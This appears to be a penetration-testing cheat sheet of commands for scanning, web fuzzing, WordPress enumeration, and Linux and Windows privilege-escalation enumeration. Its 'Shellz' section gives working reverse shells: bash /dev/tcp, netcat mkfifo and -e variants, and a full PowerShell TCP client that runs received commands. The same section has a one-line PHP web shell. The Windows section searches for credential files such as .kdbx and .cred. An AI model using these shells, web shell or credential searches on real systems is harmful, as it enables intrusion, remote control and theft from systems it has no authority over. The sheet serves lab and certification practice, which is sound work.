References

This little cheat sheet was inspired by Siren. Please go support her at her blog: https://sirensecurity.io/blog/

Knock_Knock.txt:

=================Scans=====================
rustscan -a $IP -n --ulimit 70000 -t 5000 -- -A -Pn
#Standard Scan
sudo nmap -v -T3 -Pn -p 161 -sU $IP
#SNMP
sudo nmap x.x.x.x -F -sU
#UDP 100 ports
=================Shellz=====================
===LINUX===
bash -i >& /dev/tcp/0.0.0.0/80 0>&1
#BASH -I (the /dev/tcp redirection is a bash feature, so plain sh will not work)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 80 >/tmp/f
#NC MKFIFO
nc 0.0.0.0 80 -e sh
#NC
===Windows===
nc.exe 0.0.0.0 80 -e cmd
#NC
powershell -e (INSERT B64 of below)
$client = New-Object System.Net.Sockets.TCPClient("0.0.0.0",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
===WEB===
<?php system($_REQUEST['cmd']); ?>
#PHP
===Stabilize===
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
(Ctrl + Z)
stty raw -echo; fg
stty rows 38 columns 116
=================WebEnum=====================
===General===
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt:FUZZ -u http://site.local/FUZZ
#DIR BUST
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt:FUZZ -u http://site.local/FUZZ
#File fuzz
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://site.local/ -H 'Host: FUZZ.site.local' -ac
#VHOST FUZZING
feroxbuster -u http://site.local/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
#Ferox
===Wordpress===
sudo wpscan --url <site> --enumerate
#Auto
wpscan --url <site> --disable-tls-checks --enumerate p --enumerate t --enumerate u
#WPScan & SSL
wpscan --url <site> --enumerate p --plugins-detection aggressive
#Plugin scan

Xray.txt:

=================LinuxEnum=====================
===Search===
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
#list Setuids
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
#List setgids
find <path> -type f -name <file_name>
#Search for files
find / -path /proc -prune -o -type d -perm -o+w -print 2>/dev/null
#Locate world-writable directories
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null
#Locate writable files
/usr/sbin/getcap -r / 2>/dev/null
#Enumerate capabilities manually
===Processes===
ps aux | grep root
#Display root owned processes
aa-enabled
#Check if apparmor is enabled
===refs===
ln -s <existing_source_file> <optional_symbolic_link>
#Symbolic link file
ln -s </target/directory> </directory/to/link/to>
#Symbolic link directory
./pspy64 -pf -i 1000
#pspy usage
=================WindowsEnum=====================
===PS===
Get-MpComputerStatus
#Check Windows Defender Status
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
#List AppLocker Rules
netstat -ano
#Display Listening ports
Select-String -Path C:\path\to\search\*.txt -Pattern <String>
#Search files for string
Get-ChildItem C:\ -Recurse -Include *.kdbx, *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
#Search for File Extensions
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
#Manual enumeration of running services
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
#List autoruns
===CMD===
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
#Verify UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
#Verify UAC level
wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows\\" | findstr /i /v """
#Manual query unquoted paths
tasklist /v /fi "username eq system"
#Display tasks running as SYSTEM (use "username ne system" to list the rest)
The information within this article is intended solely for educational purposes. It is crucial that the techniques and methodologies discussed should only be used for educational and ethical purposes. They should never be leveraged in a manner that could cause unlawful harm or infringe upon the rights, security, or privacy of others. It is essential for anyone engaging with this content to approach it with a mindset of learning and understanding, ensuring that knowledge gained is used responsibly and ethically.